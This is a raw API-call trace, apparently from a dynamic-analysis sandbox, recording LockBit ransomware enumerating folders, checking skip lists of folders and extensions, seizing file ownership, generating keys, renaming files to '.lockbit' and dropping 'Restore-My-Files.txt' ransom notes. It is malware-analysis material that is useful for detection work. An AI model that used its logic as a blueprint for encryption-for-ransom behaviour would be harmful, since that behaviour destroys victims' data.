[0091.428] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\sports_disc_mask.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\sports_disc_mask.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0091.428] malloc (_Size=0xb6) returned 0x1ff1e60 [0091.428] NtSetInformationFile (FileHandle=0x4b4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xb6, FileInformationClass=0xa) returned 0xc0000008 [0091.429] free (_Block=0x1ff1e60) [0091.429] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\sports_disc_mask.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports") returned 1 [0091.429] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\Restore-My-Files.txt") returned 72 [0091.429] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0091.429] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71384d39, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71384d39, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff68a0b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x23d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="sports_disc_mask.png", cAlternateFileName="")) returned 0 [0091.429] FindClose (in: hFindFile=0x55fe78 | out: hFindFile=0x55fe78) returned 1 [0091.429] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa198102e, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa9057bb, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa19a729d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x520150, dwReserved1=0x0, cFileName="Stacking", cAlternateFileName="")) returned 1 [0091.429] lstrcmpiW (lpString1=".", lpString2="Stacking") returned -1 [0091.429] lstrcmpiW (lpString1="..", lpString2="Stacking") returned -1 [0091.429] lstrcmpiW (lpString1="Stacking", lpString2="$windows.~bt") returned 1 [0091.429] lstrcmpiW (lpString1="Stacking", lpString2="intel") returned 1 [0091.429] lstrcmpiW (lpString1="Stacking", lpString2="msocache") returned 1 [0091.430] lstrcmpiW (lpString1="Stacking", lpString2="$recycle.bin") returned 1 [0091.430] lstrcmpiW (lpString1="Stacking", lpString2="$windows.~ws") returned 1 [0091.430] lstrcmpiW (lpString1="Stacking", lpString2="tor browser") returned -1 [0091.430] lstrcmpiW (lpString1="Stacking", lpString2="boot") returned 1 [0091.430] lstrcmpiW (lpString1="Stacking", lpString2="system volume information") returned -1 [0091.430] lstrcmpiW (lpString1="Stacking", lpString2="perflogs") returned 1 [0091.430] lstrcmpiW (lpString1="Stacking", lpString2="google") returned 1 [0091.430] lstrcmpiW (lpString1="Stacking", lpString2="application data") returned 1 [0091.430] lstrcmpiW (lpString1="Stacking", lpString2="windows") returned -1 [0091.430] lstrcmpiW (lpString1="Stacking", lpString2="windows.old") returned -1 [0091.430] lstrcmpiW (lpString1="Stacking", lpString2="appdata") returned 1 [0091.430] lstrcmpiW (lpString1="Stacking", lpString2="Windows nt") returned -1 [0091.430] lstrcmpiW (lpString1="Stacking", lpString2="Msbuild") returned 1 [0091.430] lstrcmpiW (lpString1="Stacking", lpString2="Microsoft") returned 1 [0091.430] lstrcmpiW (lpString1="Stacking", lpString2="All users") returned 1 [0091.430] lstrcmpiW (lpString1="Stacking", lpString2="mozilla") returned 1 [0091.430] lstrcmpiW (lpString1="Stacking", lpString2="Microsoft.NET") returned 1 [0091.430] lstrcmpiW (lpString1="Stacking", lpString2="microsoft shared") returned 1 [0091.430] lstrcmpiW (lpString1="Stacking", lpString2="Internet Explorer") returned 1 [0091.430] lstrcmpiW (lpString1="Stacking", lpString2="common files") returned 1 [0091.430] lstrcmpiW (lpString1="Stacking", lpString2="opera") returned 1 [0091.430] lstrcmpiW (lpString1="Stacking", lpString2="Windows Journal") returned -1 [0091.431] wsprintfW (in: param_1=0x3d6b928, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking") returned 53 [0091.431] wsprintfW (in: param_1=0x3d6ad00, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\*") returned 55 [0091.431] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6b120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6b120) returned 0x55fe78 [0091.435] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0091.435] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa198102e, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa9057bb, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa19a729d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.435] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0091.435] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0091.435] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f740a33, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f740a33, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x540920df, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x0, dwReserved1=0x0, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 [0091.435] lstrcmpiW (lpString1=".", lpString2="1047x576black.png") returned -1 [0091.435] lstrcmpiW (lpString1="..", lpString2="1047x576black.png") returned -1 [0091.435] PathFindExtensionW (pszPath="1047x576black.png") returned=".png" [0091.435] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0091.435] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0091.435] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0091.436] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0091.436] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0091.436] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0091.436] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0091.436] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0091.436] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0091.436] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0091.436] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0091.436] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0091.436] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0091.436] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0091.436] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0091.436] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0091.436] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0091.436] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0091.436] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0091.436] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0091.436] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0091.436] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0091.436] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0091.436] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0091.436] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0091.436] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0091.436] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0091.437] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0091.437] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0091.437] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0091.437] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0091.437] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0091.437] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0091.437] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0091.437] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0091.437] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0091.437] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0091.437] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0091.437] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0091.437] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0091.437] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0091.437] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0091.437] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0091.437] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0091.437] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0091.437] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0091.437] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0091.437] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="1047x576black.png") returned 1 [0091.437] lstrcmpiW (lpString1="ntldr", lpString2="1047x576black.png") returned 1 [0091.437] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="1047x576black.png") returned 1 [0091.438] lstrcmpiW (lpString1="bootsect.bak", lpString2="1047x576black.png") returned 1 [0091.438] lstrcmpiW (lpString1="autorun.inf", lpString2="1047x576black.png") returned 1 [0091.438] lstrcmpiW (lpString1="thumbs.db", lpString2="1047x576black.png") returned 1 [0091.438] lstrcmpiW (lpString1="iconcache.db", lpString2="1047x576black.png") returned 1 [0091.438] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\") returned="" [0091.438] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576black.png") returned=".png" [0091.438] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0091.438] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0091.438] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0091.438] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0091.439] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0091.439] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0091.439] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0091.439] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0091.439] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0091.439] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0091.439] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0091.439] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0091.439] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0091.439] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0091.439] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0091.439] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0091.439] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0091.439] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0091.439] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0091.439] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0091.439] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0091.439] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0091.439] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0091.439] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0091.439] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0091.440] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0091.440] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0091.440] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0091.440] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576black.png.lockbit") returned 79 [0091.440] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\1047x576black.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0091.442] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0091.443] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0091.443] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0091.444] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0091.446] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0091.446] RtlFreeAnsiString (AnsiString="\\") [0091.446] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x4b4) returned 0x0 [0091.446] malloc (_Size=0x200) returned 0x2071008 [0091.446] NtQueryInformationToken (in: TokenHandle=0x4b4, TokenInformationClass=0x1, TokenInformation=0x2071008, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x2071008, ReturnLength=0x3d6acd8) returned 0x0 [0091.446] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0091.446] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x2071010*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0091.446] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576black.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0091.447] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576black.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0091.447] CloseHandle (hObject=0x4b4) returned 1 [0091.447] free (_Block=0x2071008) [0091.447] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\1047x576black.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x4b4 [0091.447] CreateIoCompletionPort (FileHandle=0x4b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0091.447] malloc (_Size=0x40068) returned 0x3d70048 [0091.448] GetFileSizeEx (in: hFile=0x4b4, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=4570) returned 1 [0091.448] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0091.450] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0091.450] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0091.450] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0091.453] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0091.453] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0091.453] ReadFile (in: hFile=0x4b4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0091.743] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576black.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576black.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0091.743] malloc (_Size=0xb4) returned 0x1ff1e60 [0091.743] NtSetInformationFile (FileHandle=0x4b4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0091.744] free (_Block=0x1ff1e60) [0091.744] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576black.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking") returned 1 [0091.744] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\Restore-My-Files.txt") returned 74 [0091.744] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x1194 [0091.745] CreateIoCompletionPort (FileHandle=0x1194, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0091.745] malloc (_Size=0x40068) returned 0x1ff1e60 [0091.753] WriteFile (in: hFile=0x1194, lpBuffer=0x1fa30f8*, nNumberOfBytesToWrite=0x472, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1fa30f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0091.755] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f71a8d6, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f71a8d6, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5396df3f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1928, dwReserved0=0x0, dwReserved1=0x0, cFileName="1047x576_91n92.png", cAlternateFileName="")) returned 1 [0091.755] lstrcmpiW (lpString1=".", lpString2="1047x576_91n92.png") returned -1 [0091.755] lstrcmpiW (lpString1="..", lpString2="1047x576_91n92.png") returned -1 [0091.755] PathFindExtensionW (pszPath="1047x576_91n92.png") returned=".png" [0091.755] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0091.755] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0091.755] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0091.755] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0091.755] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0091.755] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0091.755] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0091.755] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0091.755] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0091.755] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0091.755] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0091.755] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0091.755] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0091.755] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0091.755] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0091.756] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0091.756] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0091.756] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0091.756] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0091.756] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0091.756] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0091.756] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0091.756] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0091.756] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0091.756] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0091.756] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0091.756] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0091.756] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0091.756] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0091.756] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0091.756] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0091.756] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0091.756] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0091.756] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0091.756] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0091.756] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0091.756] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0091.757] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0091.757] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0091.757] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0091.757] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0091.757] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0091.757] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0091.757] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0091.757] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0091.757] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0091.757] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0091.757] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="1047x576_91n92.png") returned 1 [0091.757] lstrcmpiW (lpString1="ntldr", lpString2="1047x576_91n92.png") returned 1 [0091.757] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="1047x576_91n92.png") returned 1 [0091.757] lstrcmpiW (lpString1="bootsect.bak", lpString2="1047x576_91n92.png") returned 1 [0091.757] lstrcmpiW (lpString1="autorun.inf", lpString2="1047x576_91n92.png") returned 1 [0091.757] lstrcmpiW (lpString1="thumbs.db", lpString2="1047x576_91n92.png") returned 1 [0091.757] lstrcmpiW (lpString1="iconcache.db", lpString2="1047x576_91n92.png") returned 1 [0091.757] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\") returned="" [0091.757] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png") returned=".png" [0091.757] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0091.757] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0091.757] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0091.757] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0091.758] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0091.758] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0091.758] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0091.758] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0091.758] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0091.758] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0091.758] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0091.758] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0091.758] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0091.758] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0091.758] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0091.758] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0091.758] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0091.758] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0091.758] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0091.758] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0091.758] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0091.758] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0091.758] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0091.758] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0091.758] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0091.759] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0091.759] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0091.759] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0091.759] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png.lockbit") returned 80 [0091.759] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\1047x576_91n92.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0091.761] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0091.762] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0091.762] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0091.764] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0091.765] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0091.765] RtlFreeAnsiString (AnsiString="\\") [0091.765] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x1198) returned 0x0 [0091.765] malloc 